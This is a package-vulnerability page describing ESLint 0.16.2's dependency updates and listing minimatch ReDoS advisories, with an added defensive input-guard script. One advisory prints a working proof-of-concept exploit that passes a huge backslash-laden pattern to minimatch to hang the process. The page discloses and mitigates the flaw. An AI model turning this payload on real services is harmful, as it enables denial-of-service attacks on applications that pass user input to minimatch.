ESLint version 0.16.2 introduces subtle yet important updates compared to its predecessor, version 0.16.1. Both versions maintain the core functionality of an AST-based pattern checker for JavaScript, relying on dependencies like chalk for console output styling, escope for scope analysis, and espree for parsing JavaScript. Developers will continue to find familiar tools like js-yaml for configuration file handling and estraverse for AST traversal.
A key difference lies in the dependencies: version 0.16.2 updates estraverse from version 1.9.1 to 2.0.0 and estraverse-fb from 1.3.0 to 1.3.1. These updates likely include bug fixes, performance improvements, and potentially new features within the AST traversal domain, crucial for ESLint's analysis capabilities. For developers, this suggests enhanced accuracy and speed in identifying code patterns.
The development dependencies remain largely consistent between the two releases, including tools for testing (like mocha and chai), browser bundling (browserify), and code coverage (istanbul). The esprima-fb version stays the same, indicating no significant shifts in Facebook's modified ECMAScript parser used for development purposes. While seemingly minor, the update to estraverse in version 0.16.2 signals a refined and possibly more robust code analysis engine, making it a worthwhile upgrade for developers seeking the most accurate and efficient linting experience.
All the vulnerabilities related to the version 0.16.2 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
var result = "";
for (var i = 0; i <= len; i++) {
result = result + chr;
}
return result;
};
// a pattern consisting of an unterminated bracket expression followed by a very long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: the call below hangs in the pattern matcher on affected versions
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update minimatch to version 3.0.2 or later.
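Upgrading is the fix; until that is done, the pattern argument should never receive raw user input. The guard below is an added example, not code from the advisory, from minimatch or from ESLint. It escapes untrusted text so minimatch treats it literally, or, when glob syntax must be allowed, rejects patterns with the shape the advisory describes (excessive length, long escape runs, an unterminated bracket expression). The length limits and the metacharacter set are assumptions to be tuned per application.

```javascript
// Added example (not from the advisory, minimatch or ESLint): guard untrusted
// pattern strings before they reach minimatch(path, pattern).
// The numeric limits are assumed values, not figures from the advisory.
const MAX_PATTERN_LENGTH = 256;   // assumed upper bound for a pattern
const MAX_ESCAPE_RUN = 16;        // assumed upper bound for consecutive backslashes

// Characters minimatch reads as glob syntax (assumed set); a preceding
// backslash makes minimatch treat the character literally.
const GLOB_META = /[*?[\]{}()!+@\\]/g;

// Escape every glob metacharacter so the input can only match itself.
function escapeGlob(input) {
  return String(input).replace(GLOB_META, '\\$&');
}

// Decide whether an untrusted pattern may be passed through unescaped.
// Returns { ok: true } or { ok: false, reason: '...' }.
function checkPattern(pattern) {
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern must be a string' };
  }
  if (pattern.length > MAX_PATTERN_LENGTH) {
    return { ok: false, reason: 'pattern too long' };
  }
  // Long runs of backslashes are the shape of the advisory's proof of concept
  // and have no legitimate use in a file-matching pattern.
  const runs = pattern.match(/\\+/g);
  if (runs && runs.some((r) => r.length > MAX_ESCAPE_RUN)) {
    return { ok: false, reason: 'excessive escape run' };
  }
  // An opening bracket without a closing one leaves the matcher to backtrack
  // over the rest of the pattern; reject it up front.
  let depth = 0;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '\\') { i++; continue; }          // skip the escaped character
    if (c === '[') depth++;
    else if (c === ']' && depth > 0) depth--;
  }
  if (depth !== 0) {
    return { ok: false, reason: 'unterminated bracket expression' };
  }
  return { ok: true };
}

// Produce the pattern that is actually handed to minimatch. By default the
// input is escaped to a literal; with allowGlob=true it is validated instead.
function patternFromUntrusted(input, allowGlob = false) {
  if (!allowGlob) return escapeGlob(input);
  const verdict = checkPattern(input);
  if (!verdict.ok) throw new Error('rejected pattern: ' + verdict.reason);
  return input;
}

module.exports = { escapeGlob, checkPattern, patternFromUntrusted };
```

Escaping is the safer default: most applications only need to match a name the user typed, not a glob the user wrote. The validation path is for the minority of cases where glob syntax is a feature, and it is a complement to, not a substitute for, running a fixed minimatch.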
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.